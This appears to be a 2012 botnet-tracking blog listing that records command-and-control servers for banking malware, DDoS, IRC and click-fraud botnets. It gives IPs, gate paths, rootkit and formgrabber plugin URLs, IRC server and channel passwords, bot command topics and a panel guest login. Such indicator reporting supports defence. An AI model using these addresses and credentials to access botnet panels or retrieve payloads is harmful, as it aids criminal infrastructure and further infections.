Resolved runescape-livestream.tv to 198.20.67.66 Server: runescape-livestream.tv Gate file: /andro/image.php Plugins Rootkit: http://runescape-livestream.tv/andro/r.pack Formgrabber: http://runescape-livestream.tv/andro/f.pack Gate file: /andro/fg.php Hosting infos: http://whois.domaintools.com/198.20.67.66
bootcamp4wealth.com (Ice 9 banking malware hosted by wiredtree.com)
Resolved bootcamp4wealth.com to 173.199.181.60 Server: bootcamp4wealth.com Gate file: bootcamp4wealth.com/wp-directory/images/config/adm/gate.php Config file: bootcamp4wealth.com/wp-directory/images/config/config/index.php Login page: bootcamp4wealth.com/wp-directory/images/config/adm/index.php?m=login Anyone infected with this is safe for now as the owner hasn’t figured out that the bot and config dropper need the same key for it to work. Hosting infos: http://whois.domaintools.com/173.199.181.60
qwer.be (YZF ddos botnet hosted by metrabyte.co.th)
Resolved qwer.be to 119.59.99.200 Server: qwer.be Gate file: /1234567/cmd.php Information for building http requests is stored in /1234567/sys/ as text files renamed to pngs. http://qwer.be/1234567/sys/UserAgent.png Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Read more...
x.n-0-r-1.org (ngr irc botnet hosted by Russian Federation Saint Petersburg Selectel Ltd.)
This botnet has lots of domains, none of which are resolving at the moment. x.n-0-r-1.org x.n0r1.org x.n2rx.asia x.n1rx.asia x.n0r2.asia x.n0r1.asia x.dload.ws x.xd11.in You can still connect to the server using it’s ip address though.. Server: 31.186.102.189 Port: 80 Server password: 666666 Channel: ##CBC-x01## * Topic for ##CBC-x01## is: !m on !mod usbi on !NAZELRead more...
f0010.info (ngr irc botnet hosted by perfectip.net)
Resolved f0010.info to 64.56.64.29, 64.56.64.26 Server: f0010.info Port: 1887 Server Password: leonis Channel: #pool Channel password: leonis * Topic for #pool is: ~pu hxxp://www.sendspace.com/pro/dl/ishh04 1f88bb85c51290b759d16dda9fff692d ~s -o ~s * Topic for #pool set by google at Mon Dec 17 12:16:33 2012 Bots also join the channel for their county, eg #US, and operating system,Read more...
bid.consulting-info.eu (Click fraud botnet hosted by quadranet.com)
Resolved bid.consulting-info.eu to s1.fclick.org (cname) Resolved s1.fclick.org to 96.44.149.187 Server: bid.consulting-info.eu Gate file: /feed/xml.php?uid=219 More click fraud courtesy of french hecker h4r3. This time it looks a bit more sophisticated though. I’m assuming this is an affiliate program as while it’s using h4r3’s domain it points to another site. If you search forRead more...
lnx.ekolik.net (LnX irc botnet hosted by sadecehosting.net)
Resolved lnx.ekolik.net to 188.132.192.238 Resolved : [p2c.ekolik.net] To [188.132.192.238] same ip diferent domain name Server: lnx.ekolik.net Port: 6667 Server password: lnx Channel: #!bot! Channel password: lnx * Topic for #!bot! is: .winrar | .p2p | .lan * Topic for #!bot! set by Z-Lined at Sun Dec 16 11:50:45 2012 Channel: #Debug# * Topic forRead more...
74.208.111.48 (HEX reptile mod hosted by 1and1.com)
ALiSs has found a new net Server: 74.208.111.48 Port: 1866 Channel: #!h! * Topic for #!h! is: .load /99/106/112/81/55/59/40/105/121/99/108/102/45/111/98/115/102/103/110/97/108/101/120/8/64/119/114/53/122/126/122/126/117/113/100/83/46/112/124/64/40/46/102/126/105/ * Topic for #!h! set by wweras at Fri Dec 14 20:55:55 2012 Hosting infos: http://whois.domaintools.com/74.208.111.48
freetraffcounter.com (Click fraud botnet hosted by worldstream.nl)
Resolved freetraffcounter.com to 109.236.87.219 This is from the same guy as all the installs stuff I just posted, but it was downloaded separately using the smoke loader so I gave it a post of it’s own. The bot first gets the ad link information from the freetraffcounter.com site. The link information is stored in javascriptRead more...
adzu324nbasmdaoias.su (Smokeloader http botnet hosted by istanbuldc.com)
Resolved adzu324nbasmdaoias.su to 185.4.227.98 Server: adzu324nbasmdaoias.su Gate file: /wp/index.php Guest login: adzu324nbasmdaoias.su/wp/guest.php guest:guest Hosting infos: http://whois.domaintools.com/185.4.227.98